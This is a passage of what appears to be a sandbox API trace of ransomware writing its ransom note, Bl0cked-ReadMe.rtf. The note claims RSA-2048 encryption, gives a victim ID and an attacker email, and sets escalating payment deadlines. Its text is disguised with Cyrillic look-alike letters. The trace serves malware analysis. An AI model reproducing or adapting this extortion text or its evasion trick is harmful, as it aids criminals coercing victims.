\\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL 
B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU DID N\\'EET R\\'E5C\\'") returned 0x1610 [0112.815] CharUpperBuffW (in: lpsz="[EML1]", cchLength=0x6 | out: lpsz="[EML1]") returned 0x6 [0112.815] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 
t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 
ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! 
\\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchLength=0x1622 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET204 CALIBRI;}{\\F1\\FNIL\\FCHARSET0 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;}\r\n{\\*\\GENERATOR MSFTEDIT 5.41.21.2510;}\\VIEWKIND4\\UC1\\PARD\\RI-500\\SA200\\SL240\\SLMULT1\\TX8804\\B\\F0\\FS28\\'C0\\LANG1033\\F1 TT\\LANG1049\\F0\\'E5\\LANG1033\\F1 NTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0 ! 
\\'C0\\LANG1033\\F1 LL\\LANG1049\\F0 \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR\\LANG1049\\F0 \\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 \\LANG1033\\F1 W\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'E5 \\'E5\\LANG1033\\F1 N\\LANG1049\\F0\\'F1\\LANG1033\\F1 RY\\LANG1049\\F0\\'F0\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D WITH RS\\LANG1049\\F0\\'C0-\\LANG1033\\F1 2048 \\LANG1049\\F0\\'E0\\LANG1033\\F1 LG\\LANG1049\\F0\\'EE\\LANG1033\\F1 RITHM\\LANG1049\\F0 .\\PAR\r\n\\PARD\\RI-74\\SA200\\SL240\\SLMULT1\\TX8378\\LANG1033\\B0\\F1\\FS24 WITH\\LANG1049\\F0\\'EE\\LANG1033\\F1 UT \\LANG1049\\F0\\'F3\\'EE\\LANG1033\\F1 UR P\\LANG1049\\F0\\'E5\\LANG1033\\F1 RS\\LANG1049\\F0\\'EE\\LANG1033\\F1 N\\LANG1049\\F0\\'E0\\LANG1033\\F1 L D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 PTI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\LANG1033\\F1 IS IMP\\LANG1049\\F0\\'EE\\LANG1033\\F1 SSIBL\\LANG1049\\F0\\'E5\\LANG1033\\F1 !\\PAR\r\nT\\LANG1049\\F0\\'EE \\LANG1033\\F1 G\\LANG1049\\F0\\'E5\\LANG1033\\F1 T Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 T TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 S\\LANG1049\\F0 , \\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\LANG1033\\F1 TO S\\LANG1049\\F0\\'E5\\LANG1033\\F1 ND TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 F\\LANG1049\\F0\\'EE\\LANG1033\\F1 LL\\LANG1049\\F0\\'EE\\LANG1033\\F1 WING C\\LANG1049\\F0\\'EE\\LANG1033\\F1 
D\\LANG1049\\F0\\'E5:\\PAR\r\n\\PARD\\SA200\\SL240\\SLMULT1\\LANG1033\\B\\F1\\FS28 COSLB0CVD9BCX1VP-3188F4D96148D062\\LANG1049\\F0\\FS32\\PAR\r\n\\LANG1033\\B0\\F1\\FS24 T\\LANG1049\\F0\\'EE\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 UR \\LANG1049\\F0\\'E5\\LANG1033\\F1 -M\\LANG1049\\F0\\'E0\\LANG1033\\F1 IL \\LANG1049\\F0\\'E0\\LANG1033\\F1 DDR\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0 : \\LANG1033\\B\\F1\\FS28 BLUETABLET9643@YAHOO.COM\\LANG1049\\B0\\F0\\FS32\\PAR\r\n\\LANG1033\\F1\\FS24 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 N Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U WILL R\\LANG1049\\F0\\'E5\\LANG1033\\F1 CI\\LANG1049\\F0\\'E5\\LANG1033\\F1 V\\LANG1049\\F0\\'E5 \\'E0\\LANG1033\\F1 LL N\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'E5\\LANG1033\\F1 SS\\LANG1049\\F0\\'E0\\LANG1033\\F1 RY INSTRU\\LANG1049\\F0\\'F1\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 NS\\LANG1049\\F0 .\\PAR\r\n\\CF1\\LANG1033\\B\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 U H\\LANG1049\\F0\\'E0\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'EE\\LANG1033\\F1 NL\\LANG1049\\F0\\'F3\\LANG1033\\F1 \\LANG1049\\F0 96\\LANG1033\\F1 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS T\\LANG1049\\F0\\'EE\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\LANG1033\\F1 C\\LANG1049\\F0\\'EE\\LANG1033\\F1 V\\LANG1049\\F0\\'E5\\LANG1033\\F1 R Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR D\\LANG1049\\F0\\'E0\\LANG1033\\F1 T\\LANG1049\\F0\\'E0\\LANG1033\\F1 ! 
\\LANG1049\\F0\\'C0\\LANG1033\\F1 FT\\LANG1049\\F0\\'E5\\LANG1033\\F1 R THIS TIM\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y\\LANG1049\\F0\\'EE\\LANG1033\\F1 UR UNIQU\\LANG1049\\F0\\'E5 \\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'F3\\'F0\\LANG1033\\F1 TI\\LANG1049\\F0\\'EE\\LANG1033\\F1 N K\\LANG1049\\F0\\'E5\\LANG1033\\F1 Y WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 D\\LANG1049\\F0\\'E5\\LANG1033\\F1 L\\LANG1049\\F0\\'E5\\LANG1033\\F1 T\\LANG1049\\F0\\'E5\\LANG1033\\F1 D \\LANG1049\\F0\\'E0\\LANG1033\\F1 ND FIL\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0 D\\'E5\\'F1R\\'F3\\'F0TI\\'EEN WILL B\\'E5C\\'EEM\\'E5 IM\\'F0\\'EESSIBL\\'E5\\LANG1033\\F1 !\\PAR\r\nHURR\\LANG1049\\F0\\'F3\\LANG1033\\F1 U\\LANG1049\\F0\\'F0\\LANG1033\\F1 ! \\LANG1049\\F0\\'C5\\'E0\\'F1\\LANG1033\\F1 H 12 H\\LANG1049\\F0\\'EE\\LANG1033\\F1 URS\\LANG1049\\F0 \\LANG1033\\F1 TH\\LANG1049\\F0\\'E5\\LANG1033\\F1 P\\LANG1049\\F0\\'E0\\'F3\\LANG1033\\F1 M\\LANG1049\\F0\\'E5\\LANG1033\\F1 NT SIZ\\LANG1049\\F0\\'E5\\LANG1033\\F1 WILL B\\LANG1049\\F0\\'E5\\LANG1033\\F1 \\LANG1049\\F0\\'E0\\LANG1033\\F1 UT\\LANG1049\\F0\\'EE\\LANG1033\\F1 M\\LANG1049\\F0\\'E0\\LANG1033\\F1 TIC\\LANG1049\\F0\\'E0\\LANG1033\\F1 LL\\LANG1049\\F0\\'F3\\LANG1033\\F1 IN\\LANG1049\\F0\\'F1\\LANG1033\\F1 R\\LANG1049\\F0\\'E5\\'E0\\LANG1033\\F1 S\\LANG1049\\F0\\'E5\\LANG1033\\F1 D B\\LANG1049\\F0\\'F3\\LANG1033\\F1 100$!\\LANG1049\\F0\\PAR\r\n\\CF0\\B0\\'C0LL TH\\'E5 \\'E0TT\\'E5MPTS \\'EEF D\\'E5\\'F1RYPTI\\'EEN BY Y\\'EEURS\\'E5LF WILL R\\'E5SULT \\'EENLY IN IRR\\'E5V\\'EE\\'F1\\'E0BLE L\\'EESS \\'EEF Y\\'EEUR D\\'E0T\\'E0.\\PAR\r\nIF Y\\'EEU STILL W\\'E0NT T\\'EE TRY T\\'EE D\\'E5CRYPT TH\\'E5M BY Y\\'EEURS\\'E5LF PL\\'E5\\'E0S\\'E5 M\\'E0K\\'E5 \\'E0 B\\'E0CKUP \\'E0T FIRST B\\'E5C\\'E0US\\'E5 TH\\'E5 D\\'E5\\'F1RYPTI\\'EEN WILL 
B\\'E5C\\'EEM\\'E5 IMP\\'EESSIBL\\'E5 IN C\\'E0S\\'E5 \\'EEF \\'E0NY CH\\'E0NG\\'E5S INSID\\'E5 TH\\'E5 FIL\\'E5S.\\PAR\r\nIF Y\\'EEU D") returned 0x1622 [0112.815] CharUpperBuffW (in: lpsz="[EML2]", cchLength=0x6 | out: lpsz="[EML2]") returned 0x6 [0112.816] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! 
\\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 
d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! 
